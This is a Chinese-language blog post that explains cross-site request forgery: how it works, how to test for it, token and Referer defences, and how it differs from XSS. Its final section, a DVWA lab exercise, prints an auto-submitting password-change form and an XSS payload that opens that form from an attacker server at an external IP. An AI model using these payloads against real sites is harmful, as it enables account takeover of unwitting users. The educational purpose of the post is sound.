CSRF跨站请求伪造原理

于 2024-10-06 19:11:26 发布
阅读量399 收藏 8
点赞数 5
分类专栏: 网络安全 文章标签: csrf 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39666388/article/details/142730580
版权

(csrf)跨站请求伪造

漏洞描述

csrf(跨站请求伪造)是一种针对网站得恶意利用

csrf攻击可以利用用户已经登陆或者已经授权得状态,伪造合法用户欺骗浏览器发出请求给受信任得网点,从而实现在授权得情况下执行一些特权操作.(如发邮件,发消息,甚至财产操作如何转账和购买商品,修改密码).由于浏览器曾经认证过,所以被访问得网站会认为是真正得用户操作而去 执行.

一句话理解:攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求

漏洞原理

简单得说,是攻击者通过一些技术手段欺骗用户得浏览器去访问一个自己曾经认证过得网站并执行一些操作(如发右键,发消息,甚至财产操作如转账和购买商品)由于浏览器曾经认证过,所以被访问得网站会认为是真正得用户操作而去执行hi.

攻击过程

1.用户打开浏览器,登陆信任网站A,输入账号密码请求登陆网站A.(登陆操作)

2.用户信息通过验证后,网站A产生Cookie信息返回给用户浏览器(返回cookie)

3.用户在未退出网站A之前,在同一浏览器又打开了一个网站B.(新建TAB页,打开了新得网站)

4.网站B接受到用户的访问请求后,网站B将包含向网站A请求的恶意的代码返回给浏览器,用户浏览器渲染执行,触发恶意请求

5.该条请求发送后,可信网站会以存储在浏览器中用户的cookie处理该请求,导致用户执行恶意操作(网站A根据请求中的cookie信息进行处理,那么最终指向恶意操作就是用户)

检测漏洞

1.一般在用户密码修改,信息修改,添加账号,发布文章等一些敏感操作位置,如果没有二次检验(图像验证码,短信验证码,原密码)就可以进行测试.(原密码校验,图形校验,短信校验等)

2.检测CSRF漏洞可以使用工具检测:CSRFTester,CSRF Request Builder,BurpSutie等

过程:

1.正常用户登陆

2.攻击者构造恶意的请求数据包

3.攻击者将恶意的请求数据包发送给正常用户

4.正常用户点击访问后,浏览器解析执行攻击者网站响应后的源码

5.造成CSRF

1.登陆账户

2.构造数据包

3.在同一浏览器打开,如果内容被修改了则存在反之没有

测试过程:点击修改->抓包点击提交->制作POC->修改提交内容->访问POC

防御方法

1.验证Referer来源

2.添加二次校验

3.增加Token校验

Token通常指的是一种用于验证用户身份或者授权用户访问资源的令牌.Token最大的特点是可预测

为什么Token可以防御CSRF

1.用在登陆成功后,服务端会生成一个Token,并将其发送回客户端,这个Token用户标识用户的会话并进行后续的身份验证.

2.客户端在每次向服务器发起请求时,都要携带这个Token,服务器收到请求后会验证Token的有效性,以确认请求的合法性,如何Token校验失败则拒绝执行该操作

3.为了增加安全性,某些系统可能会定期更换Token

Token写入Cookie安全吗?

不安全,因为浏览器在发出恶意csrf请求时,时自动带着你的cookie,如果token在cookie中也会被以同携带这样就不安全了.

CSRF与XSS

漏洞区别

1.攻击方式

XSS漏洞:xss攻击利用了应用程序中的不安全输入验证,允许攻击者将恶意脚本插入到网页中,当其他用访问包含恶意脚本的页面时,这些脚本将在用户浏览器中执行.

csrf漏洞:CSRF攻击利用了用户当前已经通过了身份验证的会话,通过伪装用户发出的请求来执行未经授权的操作.攻击者诱使用户执行某些操作,而用户可能不知道自己在执行这些操作.

2.攻击目标

XSS漏洞:XSS攻击目标时其他用户的浏览器,攻击者试图在受害者的浏览器上执行恶意脚本,以窃取会话信息,Cookie,或者执行其他恶意操作.

CSRF漏洞:CSRF攻击的目标是已经通过身份验证的用户,攻击者试图以用户的身份执行未经授权的操作,例如更改密码,发送恶意电子邮件等.

组合利用

环境:DVWA靶场+LOW等级+CSRF+XSS

步骤一:将如下代码放置攻击者web服务器中

访问解析后自动提交表单

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "42" );
function pausecomp(millis){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);}
function fireForms(){
var count = 1;
var i=0;
for(i=0; i<count; i++){
document.forms[i].submit();
pausecomp(pauses[i]);}}
</script>
<form action="http://127.0.0.1/vulnerabilities/csrf/">
<input type="hidden" name="password&#95;new" value="admin" />
<input type="hidden" name="password&#95;conf" value="admin" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

步骤二:将如下代码插入到存在xss的位置

<script src="x" onerror=javascript:window.open(http://8.141.11.61:8000/csrf.html)></script>

当用户访问到存在xss页面时,解析js代码,向更新密码接口发送请求,并传递指定的新密码进行更新.

一只抑郁的布偶猫
关注
专栏目录
CSRF跨站请求伪造原理及示例
m0_62480631的博客
04-04 2186
CSRF,全称为Cross-Site Request Forgery,即跨站请求伪造。这是一种攻击方式,它利用用户已登录的身份,在用户毫不知情的情况下,以用户名义执行非法操作。简单来说,就是攻击者诱导用户访问一个恶意网页,该网页利用用户当前的会话(例如,用户登录了一个网站后的cookie信息),在后台向另一个网站发起非法请求CSRF攻击也成为"one click"攻击。
CSRF跨站请求伪造原理、过程、防御方案
qq_37432174的博客
11-23 2468
3.即便黑客无法篡改 Referer 值,因为 Referer 值会记录下用户的访问来源,有些用户认为这样会侵犯到他们自己的隐私权,因此用户自己可以设置浏览器使其在发送请求时不再提供Referer。网站A并不知道该请求其实是由B发起的,所以会根据用户C的Cookie信息以C的权限处理该请求,导致来自网站B的恶意代码被执行。服务器用同样的HS256算法和同样的密钥,对数据再进行一次签名,和客户端返回的Token的签名进行比较,如果验证成功,就向客户端返回请求的数据。
CSRF跨站请求伪造原理 和 防范措施
晓康的博客
08-14 514
1.什么是CSRFCSRF:Cross-site request forgery (跨站请求伪造) 利用网站对已认证的权限去执行未授权的命令的一种恶意攻击 攻击者会盗用你的登记信息,以你的身份模拟发送请求。比如转账汇款操作 web 身份认证机制只能识别一个请求是否来自某个用户浏览器,但是无法保证请求是用户自己或者批准发送的 图解:左边是用户,右边是需要登陆的...
CSRF跨站请求伪造
YhMjQx的博客
08-20 720
Crose-Site Request Forgery,跨站请求伪造,攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在CSRF的攻击场景中,攻击者会伪造一个请求(一般为链接),然后欺骗用户进行点击。用户一旦点击,整个攻击也就完成了。所以CSRF攻击也被称为“one click”攻击。用户登录受信任的网站 A,并在本地生成了相应的 Cookie 用于身份验证。网站 A 没有对用户请求进行有效的同源验证。
CSRF跨站请求伪造原理和防御
一呀一转转圈
11-17 162
如何进行: 当你在某网页登录后,在没有关闭网页的情况下,收到别人的链接。例如:http://xxx.xxx.xxx.xxx/dva/csrf/?password_new=1&password_conf=1&Change=Change# 点击链接,会利用浏览器的cookie把密码改掉。 主要原理: 在没有关闭相关网页的情况下,点击其他人发来的CSRF链接,利用客户端的cookie直接向服务器发送请求。 防御手段: 检测Referer Anti-CSRF token机制 业务上要求
CSRF 跨站请求伪造
m0_69043895的博客
04-19 1129
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比更具危险性。
【WEB漏洞原理CSRF跨站请求伪造
过期的秋刀鱼
08-28 1488
跨站请求伪造(Cross Site Request Forgery,CSRF)是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击,攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,则成功的CSRF 攻击可以强制用户执行更改状态的请求,例如转移资金、修改密码等操作。
解决Csrf跨站请求伪造
qq_44090577的博客
07-11 316
解决Csrf跨站请求伪造 1.在form表单中添加一个自带的字段{{form.csrf_token}} 2. 需要csrf保护 解决: 设置app.secret_key app.secret_key = ‘rfagsrg’ 在响应的html模板的Form表单中加上: {{form.csrf_token}} 或者: {{form.hidden_tag()}} ...
Web渗透-CSRF跨站请求伪造
WolvenSec的博客
06-22 1373
跨站请求伪造(Cross-Site Request Forgery,CSRF)是一种网络攻击,通过利用受害者的身份认证状态在不知情的情况下执行恶意操作。通常,这种攻击会诱使用户点击恶意链接或访问一个特制的网站,从而触发不被用户所知的请求,导致用户意图之外的行为,如更改用户设置、转账等。
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
Django CSRF跨站请求伪造防护过程解析
01-01
CSRF全称Cross-site request forgery(跨站请求伪造),是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 攻击原理 1、用户访问正常的网站A,浏览器就会保存网站A...
【项目实战】Web端常见的高风险漏洞与解决方法(CSRF跨站请求伪造 攻击)
本本本添哥
11-25 1110
CSRF(Cross-site request forgery 跨站请求伪造
Pikachu-csrf-CSRF(POST)
guanrongl的专栏
10-03 240
拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC。打开 poc.html 页面,点击submit request ,即可达成攻击;得到以下 html 代码 ,生成poc.html 文件,当用户点击。
Pikachu-csrf-CSRF(get)
guanrongl的专栏
10-03 272
就是 get请求csrf 攻击payload。登陆,修改个人信息;发现这是个get请求
网络安全概述:从认知到实践
l1x1n0的博客
10-04 485
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 413
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1316
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
企业间图文档发放:如何在保障安全的同时提升效率?
文件数据安全交换
09-29 761
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。《Ftrans B2B企业间文件安全交换系统》仅需通用浏览器即可使用,用户界面清晰明了,功能操作和收发流程简单便捷,可快速在企业内外部推行,实现安全的图文档发放,极大降低用户学习成本,提升终端用户满意度,为企业内外部的业务协作提供保障。
Web网络CSRF跨站请求伪造基本原理是什么,如何防御?
02-06
跨站请求伪造(Cross-Site Request Forgery, CSRF)是一种恶意攻击,目的是在用户不知情的情况下,让用户的浏览器执行恶意请求。这种攻击利用了浏览器在同一站点内的身份验证凭证,例如Cookie,来执行恶意请求跨站请求伪造攻击的基本原理是,攻击者向受害者发送一个包含恶意请求的链接,例如通过电子邮件、即时通讯或社交媒体平台发送。如果受害者点击了该链接,浏览器就会自动向目标站点发送请求,而受害者并不知情。由于浏览器在同一站点内已经进行了身份验证,因此目标站点会认为这是受害者本人发起的请求,并对请求进行处理。 要防御跨站请求伪造攻击,有以下几种方法: 1. 在 HTTP 头中添加自定义的 HTTP 头,例如 X-Requested-With,表明这是一个有效请求。这样可以防止攻击者通过纯 HTML 页面执行恶意请求。 2. 使用验证码。验证码能够有效地防止机器人自动执行恶意请求。 3. 使用双重身份验证。双重身份
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值